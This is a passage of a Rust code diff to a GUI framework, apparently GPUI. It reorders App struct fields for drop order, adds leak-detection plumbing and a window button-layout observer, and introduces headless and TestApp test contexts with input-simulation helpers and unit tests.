pub(crate) windows: SlotMap<WindowId, Option<Box<Window>>>,
pub(crate) window_handles: FxHashMap<WindowId, AnyWindowHandle>,
@@ -596,10 +597,8 @@ pub struct App {
pub(crate) global_action_listeners:
FxHashMap<TypeId, Vec<Rc<dyn Fn(&dyn Any, DispatchPhase, &mut Self)>>>,
pending_effects: VecDeque<Effect>,
- pub(crate) pending_notifications: FxHashSet<EntityId>,
- pub(crate) pending_global_notifications: FxHashSet<TypeId>,
+
pub(crate) observers: SubscriberSet<EntityId, Handler>,
- // TypeId is the type of the event that the listener callback expects
pub(crate) event_listeners: SubscriberSet<EntityId, (TypeId, Listener)>,
pub(crate) keystroke_observers: SubscriberSet<(), KeystrokeObserver>,
pub(crate) keystroke_interceptors: SubscriberSet<(), KeystrokeObserver>,
@@ -609,8 +608,30 @@ pub struct App {
pub(crate) global_observers: SubscriberSet<TypeId, Handler>,
pub(crate) quit_observers: SubscriberSet<(), QuitHandler>,
pub(crate) restart_observers: SubscriberSet<(), Handler>,
- pub(crate) restart_path: Option<PathBuf>,
pub(crate) window_closed_observers: SubscriberSet<(), WindowClosedHandler>,
+
+ /// Per-App element arena. This isolates element allocations between different
+ /// App instances (important for tests where multiple Apps run concurrently).
+ pub(crate) element_arena: RefCell<Arena>,
+ /// Per-App event arena.
+ pub(crate) event_arena: Arena,
+
+ // Drop globals last. We need to ensure all tasks owned by entities and
+ // callbacks are marked cancelled at this point as this will also shutdown
+ // the tokio runtime. As any task attempting to spawn a blocking tokio task,
+ // might panic.
+ pub(crate) globals_by_type: FxHashMap<TypeId, Box<dyn Any>>,
+
+ // assets
+ pub(crate) loading_assets: FxHashMap<(TypeId, u64), Box<dyn Any>>,
+ asset_source: Arc<dyn AssetSource>,
+ pub(crate) svg_renderer: SvgRenderer,
+ http_client: Arc<dyn HttpClient>,
+
+ // below is plain data, the drop order is insignificant here
+ pub(crate) pending_notifications: FxHashSet<EntityId>,
+ pub(crate) pending_global_notifications: FxHashSet<TypeId>,
+ pub(crate) restart_path: Option<PathBuf>,
pub(crate) layout_id_buffer: Vec<LayoutId>, // We recycle this memory across layout requests.
pub(crate) propagate_event: bool,
pub(crate) prompt_builder: Option<PromptBuilder>,
@@ -624,13 +645,18 @@ pub struct App {
#[cfg(any(test, feature = "test-support", debug_assertions))]
pub(crate) name: Option<&'static str>,
pub(crate) text_rendering_mode: Rc<Cell<TextRenderingMode>>,
+
+ pub(crate) window_update_stack: Vec<WindowId>,
+ pub(crate) mode: GpuiMode,
+ flushing_effects: bool,
+ pending_updates: usize,
quit_mode: QuitMode,
quitting: bool,
- /// Per-App element arena. This isolates element allocations between different
- /// App instances (important for tests where multiple Apps run concurrently).
- pub(crate) element_arena: RefCell<Arena>,
- /// Per-App event arena.
- pub(crate) event_arena: Arena,
+
+ // We need to ensure the leak detector drops last, after all tasks, callbacks and things have been dropped.
+ // Otherwise it may report false positives.
+ #[cfg(any(test, feature = "leak-detection"))]
+ _ref_counts: Arc<RwLock<EntityRefCounts>>,
}
impl App {
@@ -652,6 +678,9 @@ impl App {
let keyboard_layout = platform.keyboard_layout();
let keyboard_mapper = platform.keyboard_mapper();
+ #[cfg(any(test, feature = "leak-detection"))]
+ let _ref_counts = entities.ref_counts_drop_handle();
+
let app = Rc::new_cyclic(|this| AppCell {
app: RefCell::new(App {
this: this.clone(),
@@ -711,6 +740,9 @@ impl App {
name: None,
element_arena: RefCell::new(Arena::new(1024 * 1024)),
event_arena: Arena::new(1024 * 1024),
+
+ #[cfg(any(test, feature = "leak-detection"))]
+ _ref_counts,
}),
});
@@ -1146,6 +1178,11 @@ impl App {
self.platform.window_appearance()
}
+ /// Returns the window button layout configuration when supported.
+ pub fn button_layout(&self) -> Option<WindowButtonLayout> {
+ self.platform.button_layout()
+ }
+
/// Reads data from the platform clipboard.
pub fn read_from_clipboard(&self) -> Option<ClipboardItem> {
self.platform.read_from_clipboard()
@@ -2041,7 +2078,8 @@ impl App {
}
/// Sets the menu bar for this application. This will replace any existing menu bar.
- pub fn set_menus(&self, menus: Vec<Menu>) {
+ pub fn set_menus(&self, menus: impl IntoIterator<Item = Menu>) {
+ let menus: Vec<Menu> = menus.into_iter().collect();
self.platform.set_menus(menus, &self.keymap.borrow());
}
@@ -479,6 +479,24 @@ impl<'a, T: 'static> Context<'a, T> {
subscription
}
+ /// Registers a callback to be invoked when the window button layout changes.
+ pub fn observe_button_layout_changed(
+ &self,
+ window: &mut Window,
+ mut callback: impl FnMut(&mut T, &mut Window, &mut Context<T>) + 'static,
+ ) -> Subscription {
+ let view = self.weak_entity();
+ let (subscription, activate) = window.button_layout_observers.insert(
+ (),
+ Box::new(move |window, cx| {
+ view.update(cx, |view, cx| callback(view, window, cx))
+ .is_ok()
+ }),
+ );
+ activate();
+ subscription
+ }
+
/// Register a callback to be invoked when a keystroke is received by the application
/// in any window. Note that this fires after all other action and event mechanisms have resolved
/// and that this API will not be invoked if the event's propagation is stopped.
@@ -59,7 +59,8 @@ pub(crate) struct EntityMap {
ref_counts: Arc<RwLock<EntityRefCounts>>,
}
-struct EntityRefCounts {
+#[doc(hidden)]
+pub(crate) struct EntityRefCounts {
counts: SlotMap<EntityId, AtomicUsize>,
dropped_entity_ids: Vec<EntityId>,
#[cfg(any(test, feature = "leak-detection"))]
@@ -84,7 +85,7 @@ impl EntityMap {
}
#[doc(hidden)]
- pub fn ref_counts_drop_handle(&self) -> impl Sized + use<> {
+ pub fn ref_counts_drop_handle(&self) -> Arc<RwLock<EntityRefCounts>> {
self.ref_counts.clone()
}
@@ -0,0 +1,275 @@
+//! Cross-platform headless app context for tests that need real text shaping.
+//!
+//! This replaces the macOS-only `HeadlessMetalAppContext` with a platform-neutral
+//! implementation backed by `TestPlatform`. Tests supply a real `PlatformTextSystem`
+//! (e.g. `DirectWriteTextSystem` on Windows, `MacTextSystem` on macOS) to get
+//! accurate glyph measurements while keeping everything else deterministic.
+//!
+//! Optionally, a renderer factory can be provided to enable real GPU rendering
+//! and screenshot capture via [`HeadlessAppContext::capture_screenshot`].
+
+use crate::{
+ AnyView, AnyWindowHandle, App, AppCell, AppContext, AssetSource, BackgroundExecutor, Bounds,
+ Context, Entity, ForegroundExecutor, Global, Pixels, PlatformHeadlessRenderer,
+ PlatformTextSystem, Render, Reservation, Size, Task, TestDispatcher, TestPlatform, TextSystem,
+ Window, WindowBounds, WindowHandle, WindowOptions,
+ app::{GpuiBorrow, GpuiMode},
+};
+use anyhow::Result;
+use image::RgbaImage;
+use std::{future::Future, rc::Rc, sync::Arc, time::Duration};
+
+/// A cross-platform headless app context for tests that need real text shaping.
+///
+/// Unlike the old `HeadlessMetalAppContext`, this works on any platform. It uses
+/// `TestPlatform` for deterministic scheduling and accepts a pluggable
+/// `PlatformTextSystem` so tests get real glyph measurements.
+///
+/// # Usage
+///
+/// ```ignore
+/// let text_system = Arc::new(gpui_wgpu::CosmicTextSystem::new("fallback"));
+/// let mut cx = HeadlessAppContext::with_platform(
+/// text_system,
+/// Arc::new(Assets),
+/// || gpui_platform::current_headless_renderer(),
+/// );
+/// ```
+pub struct HeadlessAppContext {
+ /// The underlying app cell.
+ pub app: Rc<AppCell>,
+ /// The background executor for running async tasks.
+ pub background_executor: BackgroundExecutor,
+ /// The foreground executor for running tasks on the main thread.
+ pub foreground_executor: ForegroundExecutor,
+ dispatcher: TestDispatcher,
+ text_system: Arc<TextSystem>,
+}
+
+impl HeadlessAppContext {
+ /// Creates a new headless app context with the given text system.
+ pub fn new(platform_text_system: Arc<dyn PlatformTextSystem>) -> Self {
+ Self::with_platform(platform_text_system, Arc::new(()), || None)
+ }
+
+ /// Creates a new headless app context with a custom text system and asset source.
+ pub fn with_asset_source(
+ platform_text_system: Arc<dyn PlatformTextSystem>,
+ asset_source: Arc<dyn AssetSource>,
+ ) -> Self {
+ Self::with_platform(platform_text_system, asset_source, || None)
+ }
+
+ /// Creates a new headless app context with the given text system, asset source,
+ /// and an optional renderer factory for screenshot support.
+ pub fn with_platform(
+ platform_text_system: Arc<dyn PlatformTextSystem>,
+ asset_source: Arc<dyn AssetSource>,
+ renderer_factory: impl Fn() -> Option<Box<dyn PlatformHeadlessRenderer>> + 'static,
+ ) -> Self {
+ let seed = std::env::var("SEED")
+ .ok()
+ .and_then(|s| s.parse().ok())
+ .unwrap_or(0);
+
+ let dispatcher = TestDispatcher::new(seed);
+ let arc_dispatcher = Arc::new(dispatcher.clone());
+ let background_executor = BackgroundExecutor::new(arc_dispatcher.clone());
+ let foreground_executor = ForegroundExecutor::new(arc_dispatcher);
+
+ let renderer_factory: Box<dyn Fn() -> Option<Box<dyn PlatformHeadlessRenderer>>> =
+ Box::new(renderer_factory);
+ let platform = TestPlatform::with_platform(
+ background_executor.clone(),
+ foreground_executor.clone(),
+ platform_text_system.clone(),
+ Some(renderer_factory),
+ );
+
+ let text_system = Arc::new(TextSystem::new(platform_text_system));
+ let http_client = http_client::FakeHttpClient::with_404_response();
+ let app = App::new_app(platform, asset_source, http_client);
+ app.borrow_mut().mode = GpuiMode::test();
+
+ Self {
+ app,
+ background_executor,
+ foreground_executor,
+ dispatcher,
+ text_system,
+ }
+ }
+
+ /// Opens a window for headless rendering.
+ pub fn open_window<V: Render + 'static>(
+ &mut self,
+ size: Size<Pixels>,
+ build_root: impl FnOnce(&mut Window, &mut App) -> Entity<V>,
+ ) -> Result<WindowHandle<V>> {
+ use crate::{point, px};
+
+ let bounds = Bounds {
+ origin: point(px(0.0), px(0.0)),
+ size,
+ };
+
+ let mut cx = self.app.borrow_mut();
+ cx.open_window(
+ WindowOptions {
+ window_bounds: Some(WindowBounds::Windowed(bounds)),
+ focus: false,
+ show: false,
+ ..Default::default()
+ },
+ build_root,
+ )
+ }
+
+ /// Runs all pending tasks until parked.
+ pub fn run_until_parked(&self) {
+ self.dispatcher.run_until_parked();
+ }
+
+ /// Advances the simulated clock.
+ pub fn advance_clock(&self, duration: Duration) {
+ self.dispatcher.advance_clock(duration);
+ }
+
+ /// Enables parking mode, allowing blocking on real I/O (e.g., async asset loading).
+ pub fn allow_parking(&self) {
+ self.dispatcher.allow_parking();
+ }
+
+ /// Disables parking mode, returning to deterministic test execution.
+ pub fn forbid_parking(&self) {
+ self.dispatcher.forbid_parking();
+ }
+
+ /// Updates app state.
+ pub fn update<R>(&mut self, f: impl FnOnce(&mut App) -> R) -> R {
+ let mut app = self.app.borrow_mut();
+ f(&mut app)
+ }
+
+ /// Updates a window and calls draw to render.
+ pub fn update_window<R>(
+ &mut self,
+ window: AnyWindowHandle,
+ f: impl FnOnce(AnyView, &mut Window, &mut App) -> R,
+ ) -> Result<R> {
+ let mut app = self.app.borrow_mut();
+ app.update_window(window, f)
+ }
+
+ /// Captures a screenshot from a window.
+ ///
+ /// Requires that the context was created with a renderer factory that
+ /// returns `Some` via [`HeadlessAppContext::with_platform`].
+ pub fn capture_screenshot(&mut self, window: AnyWindowHandle) -> Result<RgbaImage> {
+ let mut app = self.app.borrow_mut();
+ app.update_window(window, |_, window, _| window.render_to_image())?
+ }
+
+ /// Returns the text system.
+ pub fn text_system(&self) -> &Arc<TextSystem> {
+ &self.text_system
+ }
+
+ /// Returns the background executor.
+ pub fn background_executor(&self) -> &BackgroundExecutor {
+ &self.background_executor
+ }
+
+ /// Returns the foreground executor.
+ pub fn foreground_executor(&self) -> &ForegroundExecutor {
+ &self.foreground_executor
+ }
+}
+
+impl Drop for HeadlessAppContext {
+ fn drop(&mut self) {
+ // Shut down the app so windows are closed and entity handles are
+ // released before the LeakDetector runs.
+ self.app.borrow_mut().shutdown();
+ }
+}
+
+impl AppContext for HeadlessAppContext {
+ fn new<T: 'static>(&mut self, build_entity: impl FnOnce(&mut Context<T>) -> T) -> Entity<T> {
+ let mut app = self.app.borrow_mut();
+ app.new(build_entity)
+ }
+
+ fn reserve_entity<T: 'static>(&mut self) -> Reservation<T> {
+ let mut app = self.app.borrow_mut();
+ app.reserve_entity()
+ }
+
+ fn insert_entity<T: 'static>(
+ &mut self,
+ reservation: Reservation<T>,
+ build_entity: impl FnOnce(&mut Context<T>) -> T,
+ ) -> Entity<T> {
+ let mut app = self.app.borrow_mut();
+ app.insert_entity(reservation, build_entity)
+ }
+
+ fn update_entity<T: 'static, R>(
+ &mut self,
+ handle: &Entity<T>,
+ update: impl FnOnce(&mut T, &mut Context<T>) -> R,
+ ) -> R {
+ let mut app = self.app.borrow_mut();
+ app.update_entity(handle, update)
+ }
+
+ fn as_mut<'a, T>(&'a mut self, _: &Entity<T>) -> GpuiBorrow<'a, T>
+ where
+ T: 'static,
+ {
+ panic!("Cannot use as_mut with HeadlessAppContext. Call update() instead.")
+ }
+
+ fn read_entity<T, R>(&self, handle: &Entity<T>, read: impl FnOnce(&T, &App) -> R) -> R
+ where
+ T: 'static,
+ {
+ let app = self.app.borrow();
+ app.read_entity(handle, read)
+ }
+
+ fn update_window<T, F>(&mut self, window: AnyWindowHandle, f: F) -> Result<T>
+ where
+ F: FnOnce(AnyView, &mut Window, &mut App) -> T,
+ {
+ let mut lock = self.app.borrow_mut();
+ lock.update_window(window, f)
+ }
+
+ fn read_window<T, R>(
+ &self,
+ window: &WindowHandle<T>,
+ read: impl FnOnce(Entity<T>, &App) -> R,
+ ) -> Result<R>
+ where
+ T: 'static,
+ {
+ let app = self.app.borrow();
+ app.read_window(window, read)
+ }
+
+ fn background_spawn<R>(&self, future: impl Future<Output = R> + Send + 'static) -> Task<R>
+ where
+ R: Send + 'static,
+ {
+ self.background_executor.spawn(future)
+ }
+
+ fn read_global<G, R>(&self, callback: impl FnOnce(&G, &App) -> R) -> R
+ where
+ G: Global,
+ {
+ let app = self.app.borrow();
+ app.read_global(callback)
+ }
+}
@@ -0,0 +1,607 @@
+//! A clean testing API for GPUI applications.
+//!
+//! `TestApp` provides a simpler alternative to `TestAppContext` with:
+//! - Automatic effect flushing after updates
+//! - Clean window creation and inspection
+//! - Input simulation helpers
+//!
+//! # Example
+//! ```ignore
+//! #[test]
+//! fn test_my_view() {
+//! let mut app = TestApp::new();
+//!
+//! let mut window = app.open_window(|window, cx| {
+//! MyView::new(window, cx)
+//! });
+//!
+//! window.update(|view, window, cx| {
+//! view.do_something(cx);
+//! });
+//!
+//! // Check rendered state
+//! assert_eq!(window.title(), Some("Expected Title"));
+//! }
+//! ```
+
+use crate::{
+ AnyWindowHandle, App, AppCell, AppContext, AsyncApp, BackgroundExecutor, BorrowAppContext,
+ Bounds, ClipboardItem, Context, Entity, ForegroundExecutor, Global, InputEvent, Keystroke,
+ MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, Pixels, Platform,
+ PlatformTextSystem, Point, Render, Size, Task, TestDispatcher, TestPlatform, TextSystem,
+ Window, WindowBounds, WindowHandle, WindowOptions, app::GpuiMode,
+};
+use std::{future::Future, rc::Rc, sync::Arc, time::Duration};
+
+/// A test application context with a clean API.
+///
+/// Unlike `TestAppContext`, `TestApp` automatically flushes effects after
+/// each update and provides simpler window management.
+pub struct TestApp {
+ app: Rc<AppCell>,
+ platform: Rc<TestPlatform>,
+ background_executor: BackgroundExecutor,
+ foreground_executor: ForegroundExecutor,
+ #[allow(dead_code)]
+ dispatcher: TestDispatcher,
+ text_system: Arc<TextSystem>,
+}
+
+impl TestApp {
+ /// Create a new test application.
+ pub fn new() -> Self {
+ Self::with_seed(0)
+ }
+
+ /// Create a new test application with a specific random seed.
+ pub fn with_seed(seed: u64) -> Self {
+ Self::build(seed, None, Arc::new(()))
+ }
+
+ /// Create a new test application with a custom text system for real font shaping.
+ pub fn with_text_system(text_system: Arc<dyn PlatformTextSystem>) -> Self {
+ Self::build(0, Some(text_system), Arc::new(()))
+ }
+
+ /// Create a new test application with a custom text system and asset source.
+ pub fn with_text_system_and_assets(
+ text_system: Arc<dyn PlatformTextSystem>,
+ asset_source: Arc<dyn crate::AssetSource>,
+ ) -> Self {
+ Self::build(0, Some(text_system), asset_source)
+ }
+
+ fn build(
+ seed: u64,
+ platform_text_system: Option<Arc<dyn PlatformTextSystem>>,
+ asset_source: Arc<dyn crate::AssetSource>,
+ ) -> Self {
+ let dispatcher = TestDispatcher::new(seed);
+ let arc_dispatcher = Arc::new(dispatcher.clone());
+ let background_executor = BackgroundExecutor::new(arc_dispatcher.clone());
+ let foreground_executor = ForegroundExecutor::new(arc_dispatcher);
+ let platform = match platform_text_system.clone() {
+ Some(ts) => TestPlatform::with_text_system(
+ background_executor.clone(),
+ foreground_executor.clone(),
+ ts,
+ ),
+ None => TestPlatform::new(background_executor.clone(), foreground_executor.clone()),
+ };
+ let http_client = http_client::FakeHttpClient::with_404_response();
+ let text_system = Arc::new(TextSystem::new(
+ platform_text_system.unwrap_or_else(|| platform.text_system.clone()),
+ ));
+
+ let app = App::new_app(platform.clone(), asset_source, http_client);
+ app.borrow_mut().mode = GpuiMode::test();
+
+ Self {
+ app,
+ platform,
+ background_executor,
+ foreground_executor,
+ dispatcher,
+ text_system,
+ }
+ }
+
+ /// Run a closure with mutable access to the App context.
+ /// Automatically runs until parked after the closure completes.
+ pub fn update<R>(&mut self, f: impl FnOnce(&mut App) -> R) -> R {
+ let result = {
+ let mut app = self.app.borrow_mut();
+ app.update(f)
+ };
+ self.run_until_parked();
+ result
+ }
+
+ /// Run a closure with read-only access to the App context.
+ pub fn read<R>(&self, f: impl FnOnce(&App) -> R) -> R {
+ let app = self.app.borrow();
+ f(&app)
+ }
+
+ /// Create a new entity in the app.
+ pub fn new_entity<T: 'static>(
+ &mut self,
+ build: impl FnOnce(&mut Context<T>) -> T,
+ ) -> Entity<T> {
+ self.update(|cx| cx.new(build))
+ }
+
+ /// Update an entity.
+ pub fn update_entity<T: 'static, R>(
+ &mut self,
+ entity: &Entity<T>,
+ f: impl FnOnce(&mut T, &mut Context<T>) -> R,
+ ) -> R {
+ self.update(|cx| entity.update(cx, f))
+ }
+
+ /// Read an entity.
+ pub fn read_entity<T: 'static, R>(
+ &self,
+ entity: &Entity<T>,
+ f: impl FnOnce(&T, &App) -> R,
+ ) -> R {
+ self.read(|cx| f(entity.read(cx), cx))
+ }
+
+ /// Open a test window with the given root view, using maximized bounds.
+ pub fn open_window<V: Render + 'static>(
+ &mut self,
+ build_view: impl FnOnce(&mut Window, &mut Context<V>) -> V,
+ ) -> TestAppWindow<V> {
+ let bounds = self.read(|cx| Bounds::maximized(None, cx));
+ let handle = self.update(|cx| {
+ cx.open_window(
+ WindowOptions {
+ window_bounds: Some(WindowBounds::Windowed(bounds)),
+ ..Default::default()
+ },
+ |window, cx| cx.new(|cx| build_view(window, cx)),
+ )
+ .unwrap()
+ });
+
+ TestAppWindow {
+ handle,
+ app: self.app.clone(),
+ platform: self.platform.clone(),
+ background_executor: self.background_executor.clone(),
+ }
+ }
+
+ /// Open a test window with specific options.
+ pub fn open_window_with_options<V: Render + 'static>(
+ &mut self,
+ options: WindowOptions,
+ build_view: impl FnOnce(&mut Window, &mut Context<V>) -> V,
+ ) -> TestAppWindow<V> {
+ let handle = self.update(|cx| {
+ cx.open_window(options, |window, cx| cx.new(|cx| build_view(window, cx)))
+ .unwrap()
+ });
+
+ TestAppWindow {
+ handle,
+ app: self.app.clone(),
+ platform: self.platform.clone(),
+ background_executor: self.background_executor.clone(),
+ }
+ }
+
+ /// Run pending tasks until there's nothing left to do.
+ pub fn run_until_parked(&self) {
+ self.background_executor.run_until_parked();
+ }
+
+ /// Advance the simulated clock by the given duration.
+ pub fn advance_clock(&self, duration: Duration) {
+ self.background_executor.advance_clock(duration);
+ }
+
+ /// Spawn a future on the foreground executor.
+ pub fn spawn<Fut, R>(&self, f: impl FnOnce(AsyncApp) -> Fut) -> Task<R>
+ where
+ Fut: Future<Output = R> + 'static,
+ R: 'static,
+ {
+ self.foreground_executor.spawn(f(self.to_async()))
+ }
+
+ /// Spawn a future on the background executor.
+ pub fn background_spawn<R>(&self, future: impl Future<Output = R> + Send + 'static) -> Task<R>
+ where
+ R: Send + 'static,
+ {
+ self.background_executor.spawn(future)
+ }
+
+ /// Get an async handle to the app.
+ pub fn to_async(&self) -> AsyncApp {
+ AsyncApp {
+ app: Rc::downgrade(&self.app),
+ background_executor: self.background_executor.clone(),
+ foreground_executor: self.foreground_executor.clone(),
+ }
+ }
+
+ /// Get the background executor.
+ pub fn background_executor(&self) -> &BackgroundExecutor {
+ &self.background_executor
+ }
+
+ /// Get the foreground executor.
+ pub fn foreground_executor(&self) -> &ForegroundExecutor {
+ &self.foreground_executor
+ }
+
+ /// Get the text system.
+ pub fn text_system(&self) -> &Arc<TextSystem> {
+ &self.text_system
+ }
+
+ /// Check if a global of the given type exists.
+ pub fn has_global<G: Global>(&self) -> bool {
+ self.read(|cx| cx.has_global::<G>())
+ }
+
+ /// Set a global value.
+ pub fn set_global<G: Global>(&mut self, global: G) {
+ self.update(|cx| cx.set_global(global));
+ }
+
+ /// Read a global value.
+ pub fn read_global<G: Global, R>(&self, f: impl FnOnce(&G, &App) -> R) -> R {
+ self.read(|cx| f(cx.global(), cx))
+ }
+
+ /// Update a global value.
+ pub fn update_global<G: Global, R>(&mut self, f: impl FnOnce(&mut G, &mut App) -> R) -> R {
+ self.update(|cx| cx.update_global(f))
+ }
+
+ // Platform simulation methods
+
+ /// Write text to the simulated clipboard.
+ pub fn write_to_clipboard(&self, item: ClipboardItem) {
+ self.platform.write_to_clipboard(item);
+ }
+
+ /// Read from the simulated clipboard.
+ pub fn read_from_clipboard(&self) -> Option<ClipboardItem> {
+ self.platform.read_from_clipboard()
+ }
+
+ /// Get URLs that have been opened via `cx.open_url()`.
+ pub fn opened_url(&self) -> Option<String> {
+ self.platform.opened_url.borrow().clone()
+ }
+
+ /// Check if a file path prompt is pending.
+ pub fn did_prompt_for_new_path(&self) -> bool {
+ self.platform.did_prompt_for_new_path()
+ }
+
+ /// Simulate answering a path selection dialog.
+ pub fn simulate_new_path_selection(
+ &self,
+ select: impl FnOnce(&std::path::Path) -> Option<std::path::PathBuf>,
+ ) {
+ self.platform.simulate_new_path_selection(select);
+ }
+
+ /// Check if a prompt dialog is pending.
+ pub fn has_pending_prompt(&self) -> bool {
+ self.platform.has_pending_prompt()
+ }
+
+ /// Simulate answering a prompt dialog.
+ pub fn simulate_prompt_answer(&self, button: &str) {
+ self.platform.simulate_prompt_answer(button);
+ }
+
+ /// Get all open windows.
+ pub fn windows(&self) -> Vec<AnyWindowHandle> {
+ self.read(|cx| cx.windows())
+ }
+}
+
+impl Default for TestApp {
+ fn default() -> Self {
+ Self::new()
+ }
+}
+
+/// A test window with inspection and simulation capabilities.
+pub struct TestAppWindow<V> {
+ handle: WindowHandle<V>,
+ app: Rc<AppCell>,
+ platform: Rc<TestPlatform>,
+ background_executor: BackgroundExecutor,
+}
+
+impl<V: 'static + Render> TestAppWindow<V> {
+ /// Get the window handle.
+ pub fn handle(&self) -> WindowHandle<V> {
+ self.handle
+ }
+
+ /// Get the root view entity.
+ pub fn root(&self) -> Entity<V> {
+ let mut app = self.app.borrow_mut();
+ let any_handle: AnyWindowHandle = self.handle.into();
+ app.update_window(any_handle, |root_view, _, _| {
+ root_view.downcast::<V>().expect("root view type mismatch")
+ })
+ .expect("window not found")
+ }
+
+ /// Update the root view.
+ pub fn update<R>(&mut self, f: impl FnOnce(&mut V, &mut Window, &mut Context<V>) -> R) -> R {
+ let result = {
+ let mut app = self.app.borrow_mut();
+ let any_handle: AnyWindowHandle = self.handle.into();
+ app.update_window(any_handle, |root_view, window, cx| {
+ let view = root_view.downcast::<V>().expect("root view type mismatch");
+ view.update(cx, |view, cx| f(view, window, cx))
+ })
+ .expect("window not found")
+ };
+ self.background_executor.run_until_parked();
+ result
+ }
+
+ /// Read the root view.
+ pub fn read<R>(&self, f: impl FnOnce(&V, &App) -> R) -> R {
+ let app = self.app.borrow();
+ let view = self
+ .app
+ .borrow()
+ .windows
+ .get(self.handle.window_id())
+ .and_then(|w| w.as_ref())
+ .and_then(|w| w.root.clone())
+ .and_then(|r| r.downcast::<V>().ok())
+ .expect("window or root view not found");
+ f(view.read(&app), &app)
+ }
+
+ /// Get the window title.
+ pub fn title(&self) -> Option<String> {
+ let app = self.app.borrow();
+ app.read_window(&self.handle, |_, _cx| {
+ // TODO: expose title through Window API
+ None
+ })
+ .unwrap()
+ }
+
+ /// Simulate a keystroke.
+ pub fn simulate_keystroke(&mut self, keystroke: &str) {
+ let keystroke = Keystroke::parse(keystroke).unwrap();
+ {
+ let mut app = self.app.borrow_mut();
+ let any_handle: AnyWindowHandle = self.handle.into();
+ app.update_window(any_handle, |_, window, cx| {
+ window.dispatch_keystroke(keystroke, cx);
+ })
+ .unwrap();
+ }
+ self.background_executor.run_until_parked();
+ }
+
+ /// Simulate multiple keystrokes (space-separated).
+ pub fn simulate_keystrokes(&mut self, keystrokes: &str) {
+ for keystroke in keystrokes.split(' ') {
+ self.simulate_keystroke(keystroke);
+ }
+ }
+
+ /// Simulate typing text.
+ pub fn simulate_input(&mut self, input: &str) {
+ for char in input.chars() {
+ self.simulate_keystroke(&char.to_string());
+ }
+ }
+
+ /// Simulate a mouse move.
+ pub fn simulate_mouse_move(&mut self, position: Point<Pixels>) {
+ self.simulate_event(MouseMoveEvent {
+ position,
+ modifiers: Default::default(),
+ pressed_button: None,
+ });
+ }
+
+ /// Simulate a mouse down event.
+ pub fn simulate_mouse_down(&mut self, position: Point<Pixels>, button: MouseButton) {
+ self.simulate_event(MouseDownEvent {
+ position,
+ button,
+ modifiers: Default::default(),
+ click_count: 1,
+ first_mouse: false,
+ });
+ }
+
+ /// Simulate a mouse up event.
+ pub fn simulate_mouse_up(&mut self, position: Point<Pixels>, button: MouseButton) {
+ self.simulate_event(MouseUpEvent {
+ position,
+ button,
+ modifiers: Default::default(),
+ click_count: 1,
+ });
+ }
+
+ /// Simulate a click at the given position.
+ pub fn simulate_click(&mut self, position: Point<Pixels>, button: MouseButton) {
+ self.simulate_mouse_down(position, button);
+ self.simulate_mouse_up(position, button);
+ }
+
+ /// Simulate a scroll event.
+ pub fn simulate_scroll(&mut self, position: Point<Pixels>, delta: Point<Pixels>) {
+ self.simulate_event(crate::ScrollWheelEvent {
+ position,
+ delta: crate::ScrollDelta::Pixels(delta),
+ modifiers: Default::default(),
+ touch_phase: crate::TouchPhase::Moved,
+ });
+ }
+
+ /// Simulate an input event.
+ pub fn simulate_event<E: InputEvent>(&mut self, event: E) {
+ let platform_input = event.to_platform_input();
+ {
+ let mut app = self.app.borrow_mut();
+ let any_handle: AnyWindowHandle = self.handle.into();
+ app.update_window(any_handle, |_, window, cx| {
+ window.dispatch_event(platform_input, cx);
+ })
+ .unwrap();
+ }
+ self.background_executor.run_until_parked();
+ }
+
+ /// Simulate resizing the window.
+ pub fn simulate_resize(&mut self, size: Size<Pixels>) {
+ let window_id = self.handle.window_id();
+ let mut app = self.app.borrow_mut();
+ if let Some(Some(window)) = app.windows.get_mut(window_id) {
+ if let Some(test_window) = window.platform_window.as_test() {
+ test_window.simulate_resize(size);
+ }
+ }
+ drop(app);
+ self.background_executor.run_until_parked();
+ }
+
+ /// Force a redraw of the window.
+ pub fn draw(&mut self) {
+ let mut app = self.app.borrow_mut();
+ let any_handle: AnyWindowHandle = self.handle.into();
+ app.update_window(any_handle, |_, window, cx| {
+ window.draw(cx).clear();
+ })
+ .unwrap();
+ }
+}
+
+impl<V> Clone for TestAppWindow<V> {
+ fn clone(&self) -> Self {
+ Self {
+ handle: self.handle,
+ app: self.app.clone(),
+ platform: self.platform.clone(),
+ background_executor: self.background_executor.clone(),
+ }
+ }
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::{FocusHandle, Focusable, div, prelude::*};
+
+ struct Counter {
+ count: usize,
+ focus_handle: FocusHandle,
+ }
+
+ impl Counter {
+ fn new(_window: &mut Window, cx: &mut Context<Self>) -> Self {
+ let focus_handle = cx.focus_handle();
+ Self {
+ count: 0,
+ focus_handle,
+ }
+ }
+
+ fn increment(&mut self, _cx: &mut Context<Self>) {
+ self.count += 1;
+ }
+ }
+
+ impl Focusable for Counter {
+ fn focus_handle(&self, _cx: &App) -> FocusHandle {
+ self.focus_handle.clone()
+ }
+ }
+
+ impl Render for Counter {
+ fn render(&mut self, _window: &mut Window, _cx: &mut Context<Self>) -> impl IntoElement {
+ div().child(format!("Count: {}", self.count))
+ }
+ }
+
+ #[test]
+ fn test_basic_usage() {
+ let mut app = TestApp::new();
+
+ let mut window = app.open_window(Counter::new);
+
+ window.update(|counter, _window, cx| {
+ counter.increment(cx);
+ });
+
+ window.read(|counter, _| {
+ assert_eq!(counter.count, 1);
+ });
+
+ drop(window);
+ app.update(|cx| cx.shutdown());
+ }
+
+ #[test]
+ fn test_entity_creation() {
+ let mut app = TestApp::new();
+
+ let entity = app.new_entity(|cx| Counter {
+ count: 42,
+ focus_handle: cx.focus_handle(),
+ });
+
+ app.read_entity(&entity, |counter, _| {
+ assert_eq!(counter.count, 42);
+ });
+
+ app.update_entity(&entity, |counter, _cx| {
+ counter.count += 1;
+ });
+
+ app.read_entity(&entity, |counter, _| {
+ assert_eq!(counter.count, 43);
+ });
+ }
+
+ #[test]
+ fn test_globals() {
+ let mut app = TestApp::new();
+
+ struct MyGlobal(String);
+ impl Global for MyGlobal {}
+
+ assert!(!app.has_global::<MyGlobal>());
+
+ app.set_global(MyGlobal("hello".into()));
+
+ assert!(app.has_global::<MyGlobal>());
+
+ app.read_global::<MyGlobal, _>(|global, _| {
+ assert_eq!(global.0, "hello");
+ });
+
+ app.update_global::<MyGlobal, _>(|global, _| {
+ global.0 = "world".into();
+ });
+
+ app.read_global::<MyGlobal, _>(|global, _| {
+ assert_eq!(global.0, "world");
+ });
+ }
+}
@@ -22,7 +22,8 @@ pub struct TestAppContext {
